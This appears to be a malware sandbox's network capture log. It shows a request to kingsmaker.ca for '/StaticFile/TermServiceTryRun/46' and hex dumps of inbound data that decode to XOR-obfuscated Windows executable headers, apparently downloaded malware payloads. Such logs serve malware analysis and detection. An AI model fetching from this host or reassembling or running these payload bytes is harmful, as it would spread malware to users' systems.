2024-11-29 08:23:27 UTC	216	IN	Data Raw: 79 6e a4 34 37 34 34 34 30 34 34 34 cb cb 34 34 8c 34 34 34 34 34 34 34 74 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 35 34 34 3a 2b 8e 3a 34 80 3d f9 15 8c 35 78 f9 15 60 5c 5d 47 14 44 46 5b 53 46 55 59 14 57 55 5a 5a 5b 40 14 56 51 14 46 41 5a 14 5d 5a 14 70 7b 67 14 59 5b 50 51 1a 39 39 3e 10 34 34 34 34 34 34 34 da d9 02 14 9e b8 6c 47 9e b8 6c 47 9e b8 6c 47 97 c0 ff 47 90 b8 6c 47 ee 39 6d 46 89 b8 6c 47 9e b8 6d 47 18 b9 6c 47 8e 3c 6f 46 8d b8 6c 47 8e 3c 68 46 a7 b8 6c 47 d6 3d 69 46 9d b8 6c 47 ee 39 68 46 9c b8 6c 47 9e b8 6c 47 9f b8 6c 47 8e 3c 69 46 e8 b8 6c 47 Data Ascii: yn474440444444444444t444444444444444444444444444444444444544:+:4=5x`\]GDF[SFUYWUZZ[@VQFAZ]Zp{gY[PQ99>4444444lGlGlGGlG9mFlGmGlG<oFlG<hFlG=iFlG9hFlGlGlG<iFlG
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: d6 3d 6c 46 9f b8 6c 47 d6 3d 6e 46 9f b8 6c 47 66 5d 57 5c 9e b8 6c 47 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 e7 54 05 53 34 34 34 34 34 34 34 34 c4 34 16 34 3f 36 3a 1d 34 0a 64 34 34 a0 75 34 34 28 28 34 ac e5 3f 34 34 24 34 34 34 34 34 74 35 34 34 34 34 24 34 34 34 36 34 34 32 34 34 34 34 34 34 34 32 34 34 34 34 34 34 34 34 74 9a 34 34 30 34 34 34 34 34 34 37 34 54 b5 34 34 24 34 34 34 34 34 34 24 34 34 34 34 34 34 34 34 24 34 34 34 34 34 34 24 34 34 34 34 34 34 34 34 34 34 24 34 34 34 34 fd 91 34 3c 36 34 34 3c ff 91 34 48 35 34 34 34 24 9a 34 86 31 34 34 34 b4 9c 34 cc b2 31 34 34 34 34 34 34 34 34 34 34 14 9a 34 78 20 34 34 a4 99 ad 34 28 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 b4 9b ad 34 1c 34 34 Data Ascii: =lFlG=nFlGf]W\lG4444444444444444dq44P<4TS4444444444?6:4d44u44((4?44$44444t54444$44464424444444244444444t44044444474T44$444444$44444444$444444$4444444444$44444<644<4H5444$414444144444444444x 444(4444444444444444444444
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: af bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 08 ec 1c 34 7c b9 31 99 bb 6c 34 7c b9 39 aa bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 2b ec 1c 34 7c b9 31 94 bb 6c 34 7c b9 39 a5 bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 36 ec 1c 34 7c b9 31 cf bb 6c 34 7c b9 39 d8 bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd d1 e3 1c 34 7c b9 31 da bb 6c 34 7c b9 39 eb bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd fc e3 1c 34 7c b9 31 d5 bb 6c 34 7c b9 39 e6 bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 9f e3 1c 34 7c b9 31 e0 bb 6c 34 7c b9 39 f1 bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd ba e3 1c 34 7c b9 31 f3 bb 6c 34 7c b9 39 8c bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 45 e3 1c 34 7c b9 31 8e bb 6c 34 7c b9 39 9f bb 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 60 e3 1c 34 7c b9 31 99 Data Ascii: l4\|4A5\|4\|1l4\|9l4\|4A5\|+4\|1l4\|9l4\|4A5\|64\|1l4\|9l4\|4A5\|4\|1l4\|9l4\|4A5\|4\|1l4\|9l4\|4A5\|4\|1l4\|9l4\|4A5\|4\|1l4\|9l4\|4A5\|E4\|1l4\|9l4\|4A5\|`4\|1
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: 0d 34 41 35 f7 7c bf e4 dd dd e6 1c 34 7c b9 31 66 a6 6c 34 7c b9 39 77 a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd f8 e6 1c 34 7c b9 31 79 a6 6c 34 7c b9 39 0a a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 9b e6 1c 34 7c b9 31 7c a6 6c 34 7c b9 39 0d a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd a6 e6 1c 34 7c b9 31 0f a6 6c 34 7c b9 39 18 a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 41 e6 1c 34 7c b9 31 1a a6 6c 34 7c b9 39 2b a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 6c e6 1c 34 7c b9 31 1d a6 6c 34 7c b9 39 2e a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 0f e6 1c 34 7c b9 31 10 a6 6c 34 7c b9 39 21 a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 2a e6 1c 34 7c b9 31 ab a6 6c 34 7c b9 39 a4 a6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 35 e6 1c 34 7c b9 31 ae a6 6c 34 7c b9 39 Data Ascii: 4A5\|4\|1fl4\|9wl4\|4A5\|4\|1yl4\|9l4\|4A5\|4\|1\|l4\|9l4\|4A5\|4\|1l4\|9l4\|4A5\|A4\|1l4\|9+l4\|4A5\|l4\|1l4\|9.l4\|4A5\|4\|1l4\|9!l4\|4A5\|*4\|1l4\|9l4\|4A5\|54\|1l4\|9
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: 3d b7 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 5e f9 1c 34 7c b9 31 67 3b 92 34 7c bf 34 7c b9 39 3d b7 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 7e f9 1c 34 7c b9 31 47 3b 92 34 7c bf 34 7c b9 39 35 b7 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 1e f9 1c 34 7c b9 31 6f 3b 92 34 7c bf 34 7c b9 39 dd b6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 3e f9 1c 34 7c b9 31 4f 3b 92 34 7c bf 34 7c b9 39 dd b6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd de f8 1c 34 7c b9 31 57 3b 92 34 7c bf 34 7c b9 39 e5 b6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd fe f8 1c 34 7c b9 31 7f 3b 92 34 7c bf 34 7c b9 39 dd b6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 9e f8 1c 34 7c b9 31 77 3b 92 34 7c bf 34 7c b9 39 35 b7 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd be f8 1c 34 7c b9 31 1f 3b 92 34 7c bf 34 7c b9 Data Ascii: =l4\|4A5\|^4\|1g;4\|4\|9=l4\|4A5\|~4\|1G;4\|4\|95l4\|4A5\|4\|1o;4\|4\|9l4\|4A5\|>4\|1O;4\|4\|9l4\|4A5\|4\|1W;4\|4\|9l4\|4A5\|4\|1;4\|4\|9l4\|4A5\|4\|1w;4\|4\|95l4\|4A5\|4\|1;4\|4\|
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: 34 7c bf 34 7c b9 39 15 b6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 3e fc 1c 34 7c b9 31 3f 39 92 34 7c bf 34 7c b9 39 3d b6 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd de f3 1c 34 7c b9 31 cf 38 92 34 7c bf 34 7c b9 39 c5 b5 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd fe f3 1c 34 7c b9 31 d7 38 92 34 7c bf 34 7c b9 39 ed b5 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 9e f3 1c 34 7c b9 31 ff 38 92 34 7c bf 34 7c b9 39 f5 b5 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd be f3 1c 34 7c b9 31 e7 38 92 34 7c bf 34 7c b9 39 9d b5 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 5e f3 1c 34 7c b9 31 ff 38 92 34 7c bf 34 7c b9 39 a5 b5 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 7e f3 1c 34 7c b9 31 87 38 92 34 7c bf 34 7c b9 39 4d b5 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 1e f3 1c 34 7c b9 31 97 38 Data Ascii: 4\|4\|9l4\|4A5\|>4\|1?94\|4\|9=l4\|4A5\|4\|184\|4\|9l4\|4A5\|4\|184\|4\|9l4\|4A5\|4\|184\|4\|9l4\|4A5\|4\|184\|4\|9l4\|4A5\|^4\|184\|4\|9l4\|4A5\|~4\|184\|4\|9Ml4\|4A5\|4\|18
2024-11-29 08:23:27 UTC	703	IN	Data Raw: 34 7c b9 31 07 3e 92 34 7c bf 34 7c b9 39 85 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 9e f6 1c 34 7c b9 31 2f 3e 92 34 7c bf 34 7c b9 39 ad 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd be f6 1c 34 7c b9 31 37 3e 92 34 7c bf 34 7c b9 39 bd 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 5e f6 1c 34 7c b9 31 df 3d 92 34 7c bf 34 7c b9 39 4d 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 7e f6 1c 34 7c b9 31 e7 3d 92 34 7c bf 34 7c b9 39 a5 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 1e f6 1c 34 7c b9 31 8f 3d 92 34 7c bf 34 7c b9 39 bd 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 3e f6 1c 34 7c b9 31 97 3d 92 34 7c bf 34 7c b9 39 45 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd de f5 1c 34 7c b9 31 97 3d 92 34 7c bf 34 7c b9 39 6d 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd fe f5 Data Ascii: 4\|1>4\|4\|9Jl4\|4A5\|4\|1/>4\|4\|9Jl4\|4A5\|4\|17>4\|4\|9Jl4\|4A5\|^4\|1=4\|4\|9MJl4\|4A5\|~4\|1=4\|4\|9Jl4\|4A5\|4\|1=4\|4\|9Jl4\|4A5\|>4\|1=4\|4\|9EJl4\|4A5\|4\|1=4\|4\|9mJl4\|4A5\|
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: 1c 34 7c b9 31 ef 3c 92 34 7c bf 34 7c b9 39 ad 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd de 8b 1c 34 7c b9 31 f7 3c 92 34 7c bf 34 7c b9 39 a5 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd fe 8b 1c 34 7c b9 31 87 3c 92 34 7c bf 34 7c b9 39 4d 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 9e 8b 1c 34 7c b9 31 87 3c 92 34 7c bf 34 7c b9 39 95 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd be 8b 1c 34 7c b9 31 af 3c 92 34 7c bf 34 7c b9 39 a5 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 5e 8b 1c 34 7c b9 31 b7 3c 92 34 7c bf 34 7c b9 39 4d 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 7e 8b 1c 34 7c b9 31 5f 3c 92 34 7c bf 34 7c b9 39 55 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 1e 8b 1c 34 7c b9 31 67 3c 92 34 7c bf 34 7c b9 39 5d 4a 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 3e Data Ascii: 4\|1<4\|4\|9Jl4\|4A5\|4\|1<4\|4\|9Jl4\|4A5\|4\|1<4\|4\|9MJl4\|4A5\|4\|1<4\|4\|9Jl4\|4A5\|4\|1<4\|4\|9Jl4\|4A5\|^4\|1<4\|4\|9MJl4\|4A5\|~4\|1_<4\|4\|9UJl4\|4A5\|4\|1g<4\|4\|9]Jl4\|4A5\|>
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: f7 7c bf e4 dd 9e 8e 1c 34 7c b9 31 37 32 92 34 7c bf 34 7c b9 39 bd 48 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd be 8e 1c 34 7c b9 31 df 31 92 34 7c bf 34 7c b9 39 45 48 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 5e 8e 1c 34 7c b9 31 e7 31 92 34 7c bf 34 7c b9 39 6d 48 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 7e 8e 1c 34 7c b9 31 ff 31 92 34 7c bf 34 7c b9 39 65 48 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 1e 8e 1c 34 7c b9 31 cf 31 92 34 7c bf 34 7c b9 39 0d 48 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 3e 8e 1c 34 7c b9 31 d7 31 92 34 7c bf 34 7c b9 39 15 48 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd de 8d 1c 34 7c b9 31 e7 31 92 34 7c bf 34 7c b9 39 3d 48 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd fe 8d 1c 34 7c b9 31 ef 31 92 34 7c bf 34 7c b9 39 c5 4f 6c 34 7c b7 0d 34 41 Data Ascii: \|4\|1724\|4\|9Hl4\|4A5\|4\|114\|4\|9EHl4\|4A5\|^4\|114\|4\|9mHl4\|4A5\|~4\|114\|4\|9eHl4\|4A5\|4\|114\|4\|9Hl4\|4A5\|>4\|114\|4\|9Hl4\|4A5\|4\|114\|4\|9=Hl4\|4A5\|4\|114\|4\|9Ol4\|4A
2024-11-29 08:23:27 UTC	1369	IN	Data Raw: 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 7e 81 1c 34 7c b9 31 e7 30 92 34 7c bf 34 7c b9 39 3d 4d 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 1e 81 1c 34 7c b9 31 8f 30 92 34 7c bf 34 7c b9 39 c5 4c 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 3e 81 1c 34 7c b9 31 97 30 92 34 7c bf 34 7c b9 39 ed 4c 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd de 80 1c 34 7c b9 31 97 30 92 34 7c bf 34 7c b9 39 f5 4c 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd fe 80 1c 34 7c b9 31 bf 30 92 34 7c bf 34 7c b9 39 9d 4c 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 9e 80 1c 34 7c b9 31 47 30 92 34 7c bf 34 7c b9 39 a5 4c 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd be 80 1c 34 7c b9 31 6f 30 92 34 7c bf 34 7c b9 39 4d 4c 6c 34 7c b7 0d 34 41 35 f7 7c bf e4 dd 5e 80 1c 34 7c b9 31 77 30 92 34 7c bf 34 7c b9 39 55 4c Data Ascii: 4\|4A5\|~4\|104\|4\|9=Ml4\|4A5\|4\|104\|4\|9Ll4\|4A5\|>4\|104\|4\|9Ll4\|4A5\|4\|104\|4\|9Ll4\|4A5\|4\|104\|4\|9Ll4\|4A5\|4\|1G04\|4\|9Ll4\|4A5\|4\|1o04\|4\|9MLl4\|4A5\|^4\|1w04\|4\|9UL

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:24:24 UTC	70	OUT	GET /StaticFile/TermServiceTryRun/46 HTTP/1.1 Host: kingsmaker.ca
2024-11-29 08:24:25 UTC	1162	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:24:25 GMT Content-Type: application/octet-stream Content-Length: 2183168 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: BFF2365257251B6BA227A5E748DBD62E CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhDEZ6g%2BH4TwQ34NSdDfYI78FjFJlCpMiNoaO2aK6vyWu70d4V%2Fy8SfmoNXEOAynzLBOEZd2EuPqCCMYVaH8iLUsv8fPzCbqa%2FZfQizErPk%2FN1oCZWPnsm%2B%2FPvirdycz7OU1y%2F8qER%2B8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24887&min_rtt=1154&rtt_var=27553&sent=125&recv=163&lost=0&retrans=0&sent_bytes=32554&recv_bytes=118491&delivery_rate=5526116&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1338448f70acd-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158765&min_rtt=158735&rtt_var=33535&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=708&delivery_rate=24113&cwnd=252&unsent_bytes=0&cid=219ae30c75c03c15&ts=721&x=0"
2024-11-29 08:24:25 UTC	207	IN	Data Raw: 63 74 7e 2e 2c 2e 2e 2e 2a 2e 21 2e d1 d1 2e 2e 96 2e 2e 2e 2e 2e 2e 2e 6e 2e 34 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2f 2e 2e 94 3e 2e 20 31 9a 27 e3 0f 96 2f 62 e3 0f be be 7a 46 47 5d 0e 5e 5c 41 49 5c 4f 43 0e 43 5b 5d 5a 0e 4c 4b 0e 5c 5b 40 0e 5b 40 4a 4b 5c 0e 79 47 40 1d 1c 23 24 0a 19 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e Data Ascii: ct~.,...*.!..........n.4................................../..>. 1'/bzFG]^\AI\OCC[]ZLK\[@[@JK\yG@#$.......................................................................................
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 7e 6b 2e 2e 62 2f 25 2e 1a 76 c0 48 2e 2e 2e 2e 2e 2e 2e 2e ce 2e 2c 2f 25 2f 2c 37 2e 22 20 2e 2e 6e 3d 2e 2e 2e 2e 2e 52 23 20 2e 2e 3e 2e 2e 2e 1e 20 2e 2e 2e 6e 2e 2e 3e 2e 2e 2e 2c 2e 2e 28 2e 2e 2e 2e 2e 2e 2e 28 2e 2e 2e 2e 2e 2e 2e 2e 1e 0c 2e 2e 2a 2e 2e 2e 2e 2e 2e 2d 2e 6e af 2e 2e 3e 2e 2e 6e 2e 2e 2e 2e 3e 2e 2e 3e 2e 2e 2e 2e 2e 2e 3e 2e 2e 2e 2e 3e 21 2e 5f 2e 2e 2e 2e ce 20 2e 2a 3f 2e 2e 2e be 3e 2e 2e b2 3f 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 6e 21 2e 22 65 2f 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 1e 21 2e 36 2e 2e 2e 2e 2e 2e 2e 2e 2e Data Ascii: .................................................~k..b/%.vH.........,/%/,7." ..n=.....R# ..>... ...n..>...,..(.......(................-.n..>..n....>..>......>....>!._.... .?...>..?..................n!."e/..........................!.6.........
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: 02 3c 6e 2e 2d 26 6c 57 5a 4b 6c 41 41 42 2e 2e 2e 2e ae d1 d1 d1 51 06 3c 6e 2e 2b 68 4f 42 5d 4b 2a 7a 5c 5b 4b 28 7d 57 5d 5a 4b 43 2c 2e 2e 72 3c 6e 2e 2d 26 79 41 5c 4a 6c 41 41 42 2c 2e 2e 2e ae d1 d1 d1 51 76 3c 6e 2e 2b 68 4f 42 5d 4b 2a 7a 5c 5b 4b 28 7d 57 5d 5a 4b 43 2c 2e 2e a2 3c 6e 2e 2d 26 62 41 40 49 6c 41 41 42 2a 2e 2e 2e ae d1 d1 d1 51 a6 3c 6e 2e 2b 68 4f 42 5d 4b 2a 7a 5c 5b 4b 28 7d 57 5d 5a 4b 43 2c 2e 2e 92 3c 6e 2e 3c 28 5d 5a 5c 47 40 49 2c 2e 2e 2e e2 3c 6e 2e 25 24 79 47 4a 4b 7d 5a 5c 47 40 49 2c 2e 2e 2e ce 3c 6e 2e 24 24 6f 40 5d 47 7d 5a 5c 47 40 49 2e 2e 2c 2e da 3c 6e 2e 22 29 78 4f 5c 47 4f 40 5a 2c 2e 2e 2a 3d 6e 2e 22 24 61 42 4b 78 4f 5c 47 4f 40 5a 2c 2e 2e 2e 36 3d 6e 2e 3d 28 7a 6d 42 4f 5d 5d b2 31 6e 2e 2c 2e 2e Data Ascii: <n.-&lWZKlAAB....Q<n.+hOB]Kz\[K(}W]ZKC,..r<n.-&yA\JlAAB,...Qv<n.+hOB]Kz\[K(}W]ZKC,..<n.-&bA@IlAAB...Q<n.+hOB]Kz\[K(}W]ZKC,..<n.<(]Z\G@I,...<n.%$yGJK}Z\G@I,...<n.$$o@]G}Z\G@I..,.<n.")xO\GO@Z,..*=n."$aBKxO\GO@Z,...6=n.=(zmBO]]1n.,..
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: 36 6e 2e 6a 2e da d1 ee 36 6e 2e 6c 2e da d1 ca 36 6e 2e 6c 2e da d1 23 37 6e 2e 6d 2e da d1 65 37 6e 2e 6c 2e da d1 54 37 6e 2e 6c 2e da d1 8d 37 6e 2e 6d 2e da d1 f9 37 6e 2e 6d 2e da d1 3e 34 6e 2e 6d 2e da d1 15 34 6e 2e 6d 2e da d1 4a 34 6e 2e 6d 2e da d1 be 34 6e 2e 6d 2e da d1 e2 34 6e 2e 6d 2e da d1 29 35 6e 2e 6d 2e da d1 6c 35 6e 2e 6d 2e da d1 a6 35 6e 2e 6d 2e da d1 eb 35 6e 2e 6c 2e da d1 d1 35 6e 2e 6c 2e da d1 17 32 6e 2e 6c 2e da d1 51 32 6e 2e 6d 2e da d1 93 32 6e 2e 6d 2e da d1 c0 32 6e 2e 6d 2e da d1 0f 33 6e 2e 6d 2e da d1 7b 33 6e 2e 64 2e db d1 a6 33 6e 2e 64 2e d8 d1 9d 33 6e 2e 64 2e d9 d1 c8 33 6e 2e 64 2e d6 d1 6f 30 6e 2e 64 2e d7 d1 5c 30 6e 2e 64 2e d4 d1 8d 30 6e 2e 64 2e d5 d1 f2 30 6e 2e 64 2e d2 d1 35 31 6e 2e 65 2e d3 d1 Data Ascii: 6n.j.6n.l.6n.l.#7n.m.e7n.l.T7n.l.7n.m.7n.m.>4n.m.4n.m.J4n.m.4n.m.4n.m.)5n.m.l5n.m.5n.m.5n.l.5n.l.2n.l.Q2n.m.2n.m.2n.m.3n.m.{3n.d.3n.d.3n.d.3n.d.o0n.d.\0n.d.0n.d.0n.d.51n.e.
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: 2e 26 2e 2f 2e 2e 2e 2e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 2c 2e 1d 2e fe be 6e 2e 26 7b 40 47 5a 60 4f 43 4b 2d 2e 96 3c 6e 2e 26 2e 2c 2e 2e 2e 2e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 6e 96 3c 6e 2e 2f 2e 2f 2f 2c 2e 2c 2e 1a 2e 16 bf 6e 2e 27 7b 40 47 5a 7d 4d 41 5e 4b 2d 2e 96 3c 6e 2e 26 2e 2c 2e 2e 2e 2e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 6e 96 3c 6e 2e 2f 2e 2f 2f 2c 2e 2c 2e 1d 2e 32 be 6e 2e 28 6b 5f 5b 4f 42 5d 2d 2e 2e 3e 6e 2e 26 2e 2c 26 b2 31 6e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 26 b2 31 6e 2e 2f 2e 2d 61 4c 44 2c 2e 2c 2e 05 2e 0a be 6e 2e 25 69 4b 5a 66 4f 5d 46 6d 41 4a 4b 2d 2e b2 3e 6e 2e 26 2e 2f 26 b2 31 6e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 2c 2e 1d 2e 22 bd 6e 2e 26 7a 41 7d 5a 5c 47 40 49 2d 2e 96 3c 6e 2e 26 2e 2c 26 b2 31 6e 2e 2e 2e 2a 7d 4b 42 48 2c 2e Data Ascii: .&./.......}KBH,.,..n.&{@GZ`OCK-.<n.&.,.......}KBH,.n<n././/,.,..n.'{@GZ}MA^K-.<n.&.,.......}KBH,.n<n././/,.,..2n.(k_[OB]-..>n.&.,&1n...}KBH,.&1n./.-aLD,.,..n.%iKZfO]FmAJK-.>n.&./&1n...}KBH,.,.."n.&zA}Z\G@I-.<n.&.,&1n...}KBH,.
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: 2e 29 3f 78 41 42 4f 5a 47 42 4b 6f 5a 5a 5c 47 4c 5b 5a 4b 36 0c 6e 2e 1a 0e 6e 2e 2e 2e 28 7d 57 5d 5a 4b 43 2e 2e 2e 2e 2c 2e 2e 2e 96 0c 6e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 72 0d 6e 2e 2e 2e 2e 2e 96 0c 6e 2e 2e 2e 2e 2e e0 0c 6e 2e 26 2e 2e 2e ea 31 6e 2e 32 be 6e 2e 0a be 6e 2e 22 bd 6e 2e 2a bd 6e 2e 0a bd 6e 2e 06 bd 6e 2e 02 bd 6e 2e 0e bd 6e 2e c2 a3 6e 2e 2a a0 6e 2e de a0 6e 2e 2e 2e 2c 2e f0 0c 6e 2e 6a 2e da d1 3d 0d 6e 2e 6a 2e da d1 2e 2e 21 66 7e 7e 69 6b 60 6f 5a 5a 5c 47 4c 5b 5a 4b 1b 2e 36 52 6e 2e 28 6d 5c 4b 4f 5a 4b 2d 2e 2e 2e 2e 2e 26 2e 2c 26 76 0d 6e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 2c 96 3c 6e 2e 2c 2e 2b 6f 6a 4f 5a 4f 2c 2e 2c 2e 6a 2e 16 52 6e 2e 28 6d 5c 4b 4f 5a 4b 2d 2e 2e 2e 2e 2e 22 2e 2d 26 76 0d 6e 2e 2e 2e 2a 7d Data Ascii: .)?xABOZGBKoZZ\GL[ZK6n.n...(}W]ZKC....,...n.............rn.....n.....n.&...1n.2n.n."n.n.n.n.n.n.n.n.n...,.n.j.=n.j...!f~~ik`oZZ\GL[ZK.6Rn.(m\KOZK-.....&.,&vn...}KBH,.,<n.,.+ojOZO,.,.j.Rn.(m\KOZK-.....".-&vn...}
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: ce 2e 2e ad 6a 0a 2a d6 c7 a5 ce 2e 2e ad 6a 0a 2a d6 c7 b3 ce 2e 2e e2 ab 09 6e 2e a1 09 6e 2e b7 09 6e 2e 2f 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e ee 2e 2e 2e 2e 2e 2e 68 8a 09 6e 2e 26 2e 2e 2e 2e 2e 2e 2e c6 08 6e 2e 02 06 6e 2e 9e 09 6e 2e 2e 2e 2e 2e 2e 2e 2e 2e 3a 07 6e 2e 02 06 6e 2e 7d 06 6e 2e 2e 2e 2e 2e 5f 06 6e 2e 3e 2e 2e 2e 0a 39 6e 2e 32 be 6e 2e 0a be 6e 2e 22 bd 6e 2e 2a bd 6e 2e e2 29 6f 2e f6 29 6f 2e 02 bd 6e 2e 0e bd 6e 2e c2 29 6f 2e 2a a0 6e 2e de a0 6e 2e 2e 2e 2e 2e 2e 2e 2f 2e 2f b2 3e 6e 2e 2a 2e 2e 2e 27 68 7c 4b 48 6d 41 5b 40 5a 22 2e 1e 0c 6e 2e fe a0 6e 2e 2e 2e 2e 2e 2d 2e ad 06 6e 2e 64 2e d7 d1 9a 06 6e 2e 64 2e d4 d1 cb 06 6e 2e 65 2e d3 d1 2e 2e 3f 7a 67 40 5a 4b 5c 48 4f 4d 4b 4a 61 4c 44 4b 4d 5a 1f 2e e2 29 6f 2e 3f 6f Data Ascii: ..j..j..n.n.n./.................hn.&.......n.n.n.........:n.n.}n....._n.>...9n.2n.n."n.n.)o.)o.n.n.)o.n.n......././>n.*...'h\|KHmA[@Z".n.n.....-.n.d.n.d.n.e...?zg@ZK\HOMKJaLDKMZ.)o.?o
